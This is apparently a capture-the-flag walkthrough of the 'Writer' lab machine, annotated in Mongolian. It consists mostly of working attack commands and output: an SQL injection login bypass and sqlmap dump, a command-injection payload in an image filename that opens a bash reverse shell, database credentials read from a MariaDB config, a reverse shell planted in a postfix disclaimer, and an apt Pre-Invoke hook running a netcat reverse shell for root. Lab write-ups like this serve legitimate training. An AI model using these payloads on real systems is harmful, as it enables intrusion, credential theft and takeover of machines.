1. IP Address
# Machine Address
10.10.11.101
# Local Address
10.10.14.31
2. Nmap
sudo nmap -sC -sV -oA nmap/writer 10.10.11.101
# Nmap 7.91 scan initiated Fri Sep 3 10:52:33 2021 as: nmap -sC -sV -oA nmap/writer 10.10.11.101
Nmap scan report for 10.10.11.101
Host is up (0.21s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 13m54s
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-03T15:06:47
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 3 10:52:58 2021 -- 1 IP address (1 host up) scanned in 25.18 seconds
3. Gobuster
gobuster dir -u http://10.10.11.101 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out
/contact (Status: 200) [Size: 4905]
/logout (Status: 302) [Size: 208] [--> http://10.10.11.101/]
/about (Status: 200) [Size: 3522]
/static (Status: 301) [Size: 313] [--> http://10.10.11.101/static/]
/. (Status: 200) [Size: 11976]
/dashboard (Status: 302) [Size: 208] [--> http://10.10.11.101/]
/server-status (Status: 403) [Size: 277]
/administrative (Status: 200) [Size: 1443]
administrative
4. SQLMap
SQL Injection үзсэн, логин хийгээгүй:
'or 1=1 -- -
Тэхээр нь Burp логин хийж байгаа хүсэлтийг файл хэлбэрээр хадаглах:
POST /administrative HTTP/1.1
Host: 10.10.11.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://10.10.11.101
DNT: 1
Connection: close
Referer: http://10.10.11.101/administrative
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
uname=admin&password=admin
Терминал:
sqlmap -r login.req --level 5 --risk 3 --threads 10
Үр дүн:
---
Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: uname=-1182' OR 8638=8638-- ITHB&password=admin
---
Testing
sqlmap -r login.req --dump-all
Цаашаа уншаад хэрэгтэй зүйл буцаагаагүй. Хэрэгтэй output-г аваад логин хийж орсон.
5. Image Upload
init.py
if request.form.get('image_url'):
image_url = request.form.get('image_url')
if ".jpg" in image_url:
try:
local_filename, headers = urllib.request.urlretrieve(image_url)
os.system("mv {} {}.jpg".format(local_filename, local_filename))
image = "{}.jpg".format(local_filename)
try:
im = Image.open(image)
im.verify()
im.close()
image = image.replace('/tmp/','')
os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
image = "/img/{}".format(image)
except PIL.UnidentifiedImageError:
os.system("rm {}".format(image))
error = "Not a valid image file!"
return render_template('add.html', error=error)
Post хэсэгт image upload хийхээр болсон.
echo -n "bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'" | base64
touch '1.jpg; `echo <BASE64 ENCODED PAYLOAD> | base64 -d | bash `;'
Бэлдээд stories хэсгийн зургийг re-upload хийнэ. Орсон эсэхийг static/img-с ороод шалган орсон байгаа бол энэ удаад burp - дамжуулж image_url хэсгийг өөрчилнө. Image нэр хэсэгт jpg хэсгийн ар талыг арилгав.
file:///var/www/writer.htb/writer/static/img/1.jpg; `echo <ENCHODED PAYLOAD> | base64 -d | bash `;
6. Enumeration
Services шалгаж үзнэ
### ss -tupln
/etc/mysql/mariadb.cnf - с username, password хараж болохоор байна.
www-data@writer:$ cd /etc/mysql
www-data@writer:/etc/mysql$ ls
conf.d
debian-start
debian.cnf
mariadb.cnf
mariadb.conf.d
my.cnf
my.cnf.fallback
www-data@writer:/etc/mysql$ cat mariadb.cnf
# The MariaDB configuration file
#
# The MariaDB/MySQL tools read configuration files in the following order:
# 1. "/etc/mysql/mariadb.cnf" (this file) to set global defaults,
# 2. "/etc/mysql/conf.d/*.cnf" to set global options.
# 3. "/etc/mysql/mariadb.conf.d/*.cnf" to set MariaDB-only options.
# 4. "~/.my.cnf" to set user-specific options.
#
# If the same option is defined multiple times, the last one will apply.
#
# One can use all long options that the program supports.
# Run program with --help to get a list of available options and with
# --print-defaults to see which it would actually understand and use.
#
# This group is read both both by the client and the server
# use it for options that affect everything
#
[client-server]
# Import all .cnf files from configuration directory
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
[client]
database = dev
user = djangouser
password = DjangoSuperPassword
default-character-set = utf8
Кyle-н нууг үг олох:
mysql -u djangouser -h 127.0.0.1 -p
DjangoSuperPassword
show databases;
use dev;
show tables;
SELECT * FROM auth_user;
pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A=
hashcat ашгилаад тайлах бололтой. Мэдэхгүй болохоор бэлэн тайлсан үг ашиглсан. (marcoantonio)
Kyle-р дамжаад John руу
ssh kyle@writer.htb
Мэйл илгээж disclaimer-р г trigger хийгээд дотор нь reverse shell хийнэ.
/etc/postfix/disclaimer
bash -i &>/dev/tcp/<YOUR IP>/<PORT> 0>&1
INSPECT_DIR=/var/spool/filter
SENDMAIL=/usr/sbin/sendmail
Эхний мөр trigger хийнэ.
#!/usr/bin/env python3
import smtplib
host = '127.0.0.1'
port = 25
From = 'kyle@writer.htb'
To = 'john@writer.htb'
Message = '''\
Subject: HI THERE! JOHN
OOPS I GOT YOU MATE.
'''
try:
io = smtplib.SMTP(host,port)
io.ehlo()
io.sendmail(From,To,Message)
except Exceptions as e:
print (e)
finally:
io.quit()
python3 script.py
nc асаагаад тэгээд John руу орохыг хүлээнэ. John ороод id_rsa авна. Хуулж аваад ssh хийхээс өмнө chmod 600 хийгээд нэвтрэн орно.
ssh -i id_rsa john@writer.htb
John /etc/apt/apt.conf.d - бичилт хийх боломжтой байна. Management group-т байна.
pspy64s суулгана.
Local
mkdir www
cd www
mv ~/dir/pspy64s .
python3 -m http.server
Machine
curl <local ip>:8000/pspy64s -o pspy64s
chmod +x pspy64s
./pspy64s
7. Exploitation
https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR IP> <PORT> >/tmp/f"};' > /etc/apt/apt.conf.d/00-pwn